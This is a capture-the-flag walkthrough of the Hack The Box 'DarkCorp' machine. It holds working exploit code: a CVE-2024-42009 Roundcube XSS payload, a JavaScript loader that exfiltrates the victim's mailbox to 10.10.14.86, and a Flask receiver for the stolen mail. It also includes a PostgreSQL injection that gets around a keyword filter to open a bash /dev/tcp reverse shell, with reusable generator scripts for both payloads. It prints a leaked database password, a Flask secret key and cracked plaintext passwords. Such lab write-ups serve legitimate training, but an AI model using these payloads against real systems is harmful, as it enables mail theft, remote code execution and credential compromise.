DarkCorp
1. User
1.1. Port scan
┌──(root㉿kali)-[~/Desktop/htb/Scepter]
└─# nmap 10.10.11.54 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-08 12:18 EDT
Nmap scan report for 10.10.11.54
Host is up (0.44s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
| 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open http syn-ack ttl 127 nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Only ports 22 and 80 are open, which is interesting.
1.2. Web
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# curl 10.10.11.54
<meta http-equiv="refresh" content="0; url=http://drip.htb/" />
Add drip.htb to /etc/hosts.
It turns out to be a webmail system; register an account and log in.
If the login fails, also add $IP mail.drip.htb to hosts.
The About button in the bottom-left corner gives version information.
Roundcube Webmail is a free, open-source, web-based IMAP email client.
Its vulnerability history is listed at https://www.cvedetails.com/vendor/8905/
I noticed a 2025 code-execution vulnerability, but that is most likely an unintended path; I will demonstrate it in Beyond Root.
The messages in the inbox reveal one user's email address.
At the bottom of the site there is a contact form for sending feedback.
Intercepting the request shows that both the recipient and the content type are client-controlled and can be changed.
So I can try sending an email to myself.
I received the email from myself; the body carried a security notice that it "may be a phishing email",
and it gave me the address of a security engineer: bcase@drip.htb
1.2.1. CVE-2024-42009 Roundcube XSS
Going through the 2024 CVEs, I found that an exploit for CVE-2024-42009 is public.
Description: a remote attacker can steal and send a victim's email via a crafted email message that abuses a desanitization issue in message_body() in program/actions/mail/show.php (fixed in Roundcube 1.6.8 and 1.5.8).
1.2.1.1. PoC construction
A PoC is given below the vulnerability description:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar">
Foo
</body>
The target sets HttpOnly on the session cookie, so the cookie cannot be read from document.cookie.
0xdf's writeup uses a better approach: load an external JS file. We then never have to resend the email to tweak the payload; we just edit script.js and open the email again.
var script = document.createElement('script');
script.src = 'http://10.10.14.86/script.js';
document.head.appendChild(script);
The loader is Base64-encoded and unpacked with the JS built-in atob(), so quotes and newlines in it cannot break the HTML attribute:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7')) foo=bar">
Foo
</body>
atob() (ASCII to binary) decodes a Base64 string; its counterpart btoa() encodes one.
I send myself an email carrying this payload.
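Assembling the payload by hand is error-prone, so here is the same construction as a small script. This is an added example, not code from the writeup or from 0xdf; the host, script path and form field values are parameters whose defaults mirror the request used here.

```python
"""Build the CVE-2024-42009 payload around an arbitrary JavaScript loader and the
contact-form body that delivers it. Added example; defaults mirror the writeup."""
import base64
from urllib.parse import urlencode


def loader_js(lhost: str, path: str = "script.js", scheme: str = "http") -> str:
    """Stage-0 loader: drop a <script> tag pointing at the attacker-hosted file."""
    return (
        "var script = document.createElement('script');\n"
        f"script.src = '{scheme}://{lhost}/{path}';\n"
        "document.head.appendChild(script);"
    )


def roundcube_body_payload(js: str) -> str:
    """Wrap `js` in the public PoC shape for CVE-2024-42009.

    The text of the <body> name attribute ends up parsed as attributes after
    Roundcube's post-sanitization handling of the body tag, so a CSS animation
    fires onanimationstart as soon as the element renders: no click required.
    The JS is Base64-wrapped so quotes in it can never terminate the attribute."""
    b64 = base64.b64encode(js.encode()).decode()
    return (
        '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes '
        f"onanimationstart=eval(atob('{b64}')) foo=bar\">\nFoo\n</body>"
    )


def contact_form_body(recipient: str, message_html: str,
                      name: str = "123", email: str = "123@123.com") -> str:
    """application/x-www-form-urlencoded body for POST /contact on drip.htb.
    The intercepted form exposes recipient and content type; the server trusts both."""
    return urlencode({
        "name": name,
        "email": email,
        "message": message_html,
        "content": "html",
        "recipient": recipient,
    })


if __name__ == "__main__":
    html_payload = roundcube_body_payload(loader_js("10.10.14.86"))
    print(contact_form_body("bcase@drip.htb", html_payload))
```

Send the printed string as the body of POST /contact; only the hosted script.js changes between attempts.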
When I open the email, my web server receives requests for script.js:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:10] "GET /script.js HTTP/1.1" 200 -
Our JS now loads in the victim's browser. Next, script.js has to do something useful.
Every message has an incrementing uid, so script.js can iterate over uids and fetch other messages from the victim's mailbox.
Following 0xdf's payload, I use this script.js:
for (let i = 1; i <= 15; i++) {
    // same-origin request for each message, then ship the HTML to our server
    fetch(`http://mail.drip.htb/?_task=mail&_action=show&_uid=${i}&_mbox=INBOX&_extwin=1`, {mode: 'no-cors'})
        .then((resp) => resp.text())
        .then((text) => fetch(`http://10.10.14.86/?id=${i}&exfil=` + btoa(text)));
}
and the following Python (Flask) script to receive the exfiltrated pages and serve script.js:
from flask import Flask, request, send_file
import base64
import logging

app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)


@app.route('/')
def index():
    # Parse the query string by hand: the btoa() output contains '+', '/' and '=',
    # and request.args would turn '+' into a space and corrupt the Base64
    query_string = request.query_string.decode('utf-8')
    mid = None
    exfil = None
    for param in query_string.split('&'):
        if '=' in param:
            key, value = param.split('=', 1)
            if key == 'id':
                mid = value
            elif key == 'exfil':
                exfil = value
    if exfil is None:
        return 'Request received'
    decoded = base64.b64decode(exfil)
    # uids that do not exist come back as an error page; skip those
    if b'SERVER ERROR!' not in decoded:
        fn = f'bcase_{mid}.html'
        with open(fn, 'wb') as f:
            f.write(decoded)
        print(f'Wrote email to {fn}')
    return 'Request received'


@app.route('/script.js')
def serve_script():
    try:
        return send_file('script.js', mimetype='application/javascript')
    except FileNotFoundError:
        return 'File not found', 404


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80, debug=False)
PS: BeEF (beef-xss) is another option for driving the XSS.
1.2.1.2. Stealing emails
Now I send the email with the malicious payload to the admin, bcase@drip.htb:
POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 392
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNjJiZDUzZTBjNDk5ZWYwYWZhYTc2NTlkOTkzNTA2NmZmNjgzNjQxZSJ9.aWsemA.GfmjmwXHe0ripuWdQ-SFt4MVw0s
Connection: keep-alive
name=123&email=123%40123.com&message=<body+title%3d"bgcolor%3dfoo"+name%3d"bar+style%3danimation-name%3aprogress-bar-stripes+onanimationstart%3deval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7'))+foo%3dbar">
++Foo
</body>&content=html&recipient=bcase@drip.htb
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python app.py
* Serving Flask app 'app'
* Debug mode: off
Wrote email to bcase_2.html
Wrote email to bcase_1.html
Wrote email to bcase_3.html
Shortly after, the admin's mailbox arrived; only three messages were valid.
One of them matters: it mentions an Analytics dashboard at dev-a3f1-01.drip.htb.
Add the host, request a password reset for bcase on its login page, then repeat the XSS exfiltration to pull the password-reset URL out of his inbox.
Set a new password and log in.
1.3. SQL injection
The dashboard has a search field, and whatever I enter produces an error.
The error message says my input has the wrong type: the query expects a string and I supplied a number.
Stacked queries are also possible:
'123';select version();
The target applies some filtering that blocks certain high-risk statements, COPY among them.
The tricks in https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/PostgreSQL%20Injection/#table-dump-time-based get around it: the keyword is assembled at runtime with CHR() inside a DO block and run via EXECUTE, so the literal word COPY never appears in the request:
'';DO $$ DECLARE cmd text; BEGIN cmd := CHR(67) || 'OPY (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.14.86/4444 0>&1"'''; EXECUTE cmd; END $$;
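To make the bypass reproducible, the following added example (not from the writeup) builds the DO-block payload for any command and runs it against a stand-in for the dashboard's filter. The filter is an assumption: the writeup only shows that COPY is rejected and that splitting the keyword with CHR() gets through.

```python
"""Generate a PostgreSQL stacked-query payload that reaches COPY ... TO PROGRAM
without the keyword appearing in the request, and show why a keyword blocklist
misses it. Added example; the blocklist is a hypothetical stand-in."""
import re

# Hypothetical server-side blocklist (assumption; only COPY is confirmed blocked)
BLOCKED_KEYWORDS = ("COPY", "pg_read_file", "pg_ls_dir", "lo_import")


def keyword_blocklist(query: str) -> bool:
    """Return True if the filter would reject `query` (a blocked word appears whole)."""
    return any(re.search(rf"\b{re.escape(k)}\b", query, re.IGNORECASE)
               for k in BLOCKED_KEYWORDS)


def pg_quote(s: str) -> str:
    """Double every single quote so `s` can be embedded in a PostgreSQL string literal."""
    return s.replace("'", "''")


def copy_to_program(command: str) -> str:
    """The statement we actually want the server to run. COPY ... TO PROGRAM is
    only allowed for superusers or members of pg_execute_server_program."""
    return f"COPY (SELECT '') TO PROGRAM '{pg_quote(command)}'"


def obfuscated_do_block(statement: str) -> str:
    """Hide the first byte of `statement` behind CHR(): the keyword only exists
    inside the server, after the DO block concatenates the text and EXECUTEs it.
    The leading '' closes the application's own string literal."""
    first, rest = statement[0], statement[1:]
    return (f"'';DO $$ DECLARE cmd text; BEGIN cmd := CHR({ord(first)}) || "
            f"'{pg_quote(rest)}'; EXECUTE cmd; END $$;")


def reverse_shell_payload(lhost: str, lport: int) -> str:
    """Bash reverse shell wrapped in the obfuscated DO block."""
    cmd = f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
    return obfuscated_do_block(copy_to_program(cmd))


if __name__ == "__main__":
    naive = "'1';" + copy_to_program("id")
    hidden = reverse_shell_payload("10.10.14.86", 4444)
    print("plain COPY blocked:", keyword_blocklist(naive))
    print("DO-block blocked:  ", keyword_blocklist(hidden))
    print(hidden)
```

Blocklists of this kind are not a control, because the keyword is only assembled inside the server. The real fixes are parameterised queries and a database role without superuser or pg_execute_server_program, since COPY ... TO PROGRAM is refused to everyone else.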
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 192.168.10.14 • 192.168.1.3 • 172.18.0.1 • 172.17.0.1 • 10.10.14.86
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from drip~10.129.232.7-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/drip~10.129.232.7-Linux-x86_64/2026_01_18-04_17_59-336.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────
postgres@drip:/var/lib/postgresql/15/main$ whoami
postgres
postgres@drip:/var/lib/postgresql/15/main$
postgres@drip:/var/lib$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:84:03:02 brd ff:ff:ff:ff:ff:ff
inet 172.16.20.3/24 brd 172.16.20.255 scope global eth0
valid_lft forever preferred_lft forever
postgres@drip:/var/lib$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:55953 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:323 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:58666 [::]:*
udp UNCONN 0 0 [::1]:323 [::]:*
tcp LISTEN 0 5 127.0.0.1:34281 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:993 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8001 0.0.0.0:*
tcp LISTEN 0 244 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=567,fd=5))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:143 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:587 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:32835 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:25 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
The addressing shows this host sits on an internal 172.16.20.0/24 network behind NAT (and the 00:15:5d MAC prefix belongs to Hyper-V, so it is a VM).
1.4. Shell as VICTOR.R
1.4.1. PostgreSQL
postgres=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+---------------+----------+-------------+-------------+------------+-----------------+---------------------------------
dripmail | dripmail_dba | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/dripmail_dba +
| | | | | | | dripmail_dba=CTc/dripmail_dba
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc |
roundcube | roundcubeuser | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/roundcubeuser +
| | | | | | | roundcubeuser=CTc/roundcubeuser
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
(5 rows)
postgres=# \c dripmail
You are now connected to database "dripmail" as user "postgres".
dripmail=# \dt
List of relations
Schema | Name | Type | Owner
--------+--------+-------+----------
public | Admins | table | postgres
public | Users | table | postgres
(2 rows)
dripmail=# select * from "Admins";
id | username | password | email
----+----------+----------------------------------+----------------
1 | bcase | 21232f297a57a5a743894a0e4a801fc3 | bcase@drip.htb
(1 row)
dripmail=# select * from "Users";
id | username | password | email | host_header | ip_address
------+----------+----------------------------------+-------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------
5001 | support | d9b9ecbf29db8054b21f303072b37c4e | support@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5002 | bcase | 1eace53df87b9a15a37fdc11da2d298d | bcase@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5003 | ebelford | 0cebd84e066fd988e89083879e88c5f9 | ebelford@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5004 | admin | 4297f44b13955235245b2497399d7a93 | admin@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 | 172.16.20.1
(4 rows)
This gives several MD5 hashes:
21232f297a57a5a743894a0e4a801fc3
d9b9ecbf29db8054b21f303072b37c4e
1eace53df87b9a15a37fdc11da2d298d
0cebd84e066fd988e89083879e88c5f9
4297f44b13955235245b2497399d7a93
Two of them crack, but both are passwords I set myself.
1.4.2. Enumeration
postgres@drip:/tmp$ cat /etc/krb5.conf
[libdefaults]
default_realm = DARKCORP.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
DARKCORP.HTB = {
kdc = darkcorp.htb
admin_server = darkcorp.htb
}
[domain_realm]
postgres@drip:/var/lib/postgresql/.gnupg$ ps -ef |grep sss
root 342 1 0 Jan17 ? 00:00:00 /usr/sbin/sssd -i --logger=files
root 530 342 0 Jan17 ? 00:00:03 /usr/libexec/sssd/sssd_be --domain darkcorp.htb --uid 0 --gid 0 --logger=files
root 583 342 0 Jan17 ? 00:00:04 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 584 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 585 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
postgres 189795 149967 0 05:16 pts/3 00:00:00 grep sss
krb5.conf plus a running SSSD (sssd_be --domain darkcorp.htb) means this Linux host is joined to the DARKCORP.HTB Kerberos realm, either FreeIPA or Active Directory; the internal scan below shows a Windows domain controller.
postgres@drip:/var/www/html/dashboard$ cat .env
# True for development, False for production
DEBUG=False
# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development
# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>
# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets
# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
>>>> DB_USERNAME=dripmail_dba
>>>> DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432
SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = 'support@drip.htb'
The .env gives us the database password, but since we already have a shell as postgres it is of no immediate use against the database itself; keep it anyway, reused credentials are common. Note that the Flask SECRET_KEY is also exposed: anyone holding it can forge the dashboard's signed session cookies.
postgres@drip:/var/www/html/dashboard$ cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
>>>> bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
postgres@drip:/var/www/html/dashboard$ ls /home
bcase ebelford vmail
postgres@drip:/var/www/html/dashboard$ ls /home/ -l
total 12
>>>> drwx------ 7 bcase bcase 4096 Feb 3 2025 bcase
drwxr-xr-x 2 ebelford ebelford 4096 Feb 5 2025 ebelford
drwxr-xr-x 2 vmail vmail 4096 Dec 19 2024 vmail
bcase's home directory is not readable for now.
1.4.3. Internal network discovery
With little else of value here, I suspect this box is only a pivot into the internal network.
I uploaded a static nmap and ran host discovery on the internal subnet:
postgres@drip:/tmp$ ./nmap -sn 172.16.20.3/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:23 MST
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0097s latency).
Nmap scan report for 172.16.20.2
Host is up (0.017s latency).
Nmap scan report for drip.darkcorp.htb (172.16.20.3)
Host is up (0.0059s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.92 seconds
Three hosts were found:
DC-01 (172.16.20.1)
172.16.20.2
drip.darkcorp.htb (172.16.20.3), the current machine
postgres@drip:/tmp$ ./nmap 172.16.20.2
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.16.20.2
Host is up (0.00054s latency).
Not shown: 1152 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
postgres@drip:/tmp$ ./nmap 172.16.20.1
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0015s latency).
Not shown: 1144 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos
135/tcp open epmap
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd
593/tcp open unknown
636/tcp open ldaps
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
postgres@drip:/tmp$
I also uploaded fscan and scanned again (for this kind of sweep fscan is more convenient):
postgres@drip:/tmp$ ./fscan-eAbbRdOo -h 172.16.20.2/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.16.20.1 is alive
(icmp) Target 172.16.20.3 is alive
(icmp) Target 172.16.20.2 is alive
[*] Icmp alive hosts len is: 3
172.16.20.2:445 open
172.16.20.2:139 open
172.16.20.2:135 open
172.16.20.2:80 open
172.16.20.1:445 open
172.16.20.1:443 open
172.16.20.1:139 open
172.16.20.1:135 open
172.16.20.1:80 open
172.16.20.1:22 open
172.16.20.3:22 open
172.16.20.1:88 open
172.16.20.3:80 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.16.20.1 code:200 len:64 title:None
[*] WebTitle http://172.16.20.3 code:200 len:64 title:None
[*] NetInfo
[*]172.16.20.2
[->]WEB-01
[->]172.16.20.2
[*] NetInfo
[*]172.16.20.1
[->]DC-01
[->]10.129.232.7
[->]172.16.20.1
[*] NetBios 172.16.20.2 DARKCORP\WEB-01
[*] NetBios 172.16.20.1 [+] DC:DARKCORP\DC-01
[*] WebTitle https://172.16.20.1 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.16.20.2 code:200 len:703 title:IIS Windows Server
Completed 11/13 [-] ssh 172.16.20.3:22 root root_123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
Completed 11/13 [-] ssh 172.16.20.1:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
No obvious weak credentials.
1.4.4. Pivoting
I use ligolo-ng to tunnel into the internal network:
postgres@drip:/tmp$ ./agent-AVElfFOs -connect 10.10.14.86:11601 -ignore-cert &
[1] 192953
postgres@drip:/tmp$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.86:11601"
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://127.0.0.1:8080
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed.
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.8.2
ligolo-ng » INFO[0005] Agent joined. id=00155d840302 name=postgres@drip remote="10.129.232.7:54378"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - postgres@drip - 10.129.232.7:54378 - 00155d840302
[Agent : postgres@drip] » interface_create --name drip
INFO[0023] Creating a new drip interface...
INFO[0023] Interface created!
[Agent : postgres@drip] » tunnel_start --tun drip
INFO[0048] Starting tunnel to postgres@drip (00155d840302)
[Agent : postgres@drip] » interface_add_route --name drip --route 172.16.20.3/24
INFO[0067] Route created.
[Agent : postgres@drip] »
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
^C
--- 172.16.20.1 ping statistics ---
22 packets transmitted, 0 received, 100% packet loss, time 21499ms
─(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -p 80,445,135,3389 -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:58 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (0.28s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Once configured, I cannot ping (the agent runs as the low-privileged postgres user), but TCP access to the internal network works fine:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 08:01 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (3.2s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5000/tcp open upnp
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
Port 5000 serves a default-looking login page.
I tried the database credentials there; they do not work.
1.4.5. PostgreSQL backup decrypted via GPG
I found a set of rotated PostgreSQL server logs:
postgres@drip:/var/log/postgresql$ ls
postgresql-15-main.log postgresql-15-main.log.2.gz postgresql-15-main.log.5.gz postgresql-15-main.log.8.gz
postgresql-15-main.log.1 postgresql-15-main.log.3.gz postgresql-15-main.log.6.gz postgresql-15-main.log.9.gz
postgresql-15-main.log.10.gz postgresql-15-main.log.4.gz postgresql-15-main.log.7.gz
They contain ebelford's hash. Note the STATEMENT: prefix: the UPDATE failed because its values were not quoted, and PostgreSQL writes a failing statement to the server log in full (log_min_error_statement defaults to ERROR), MD5 included:
postgres@drip:/var/log/postgresql$ zcat *.gz | grep ebelford
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT: UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
It cracks to the plaintext ThePlague61780.
This password works for SSH as ebelford.
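Both hash sets on this page (the live Admins/Users tables above and the hash recovered from the log here) are unsalted MD5, which is why a wordlist recovers them instantly. The added example below, not from the writeup, pulls hashes out of log lines in the format seen above, checks them against a small wordlist, and shows the salted, iterated scheme that would have made the leak harmless. The log sample is constructed: the first STATEMENT line is the real ebelford entry, the second is made up with md5("admin") so the result can be checked offline; the wordlist is likewise constructed from the plaintexts the writeup recovers plus a few common passwords.

```python
"""Extract password hashes from PostgreSQL error logs, test them against a
wordlist, and contrast unsalted MD5 with a salted, iterated hash. Added example."""
import hashlib
import hmac
import os
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the format of /var/log/postgresql/postgresql-15-main.log.
# Line 2 is the real entry from the box; line 3 is made up and its hash is md5("admin").
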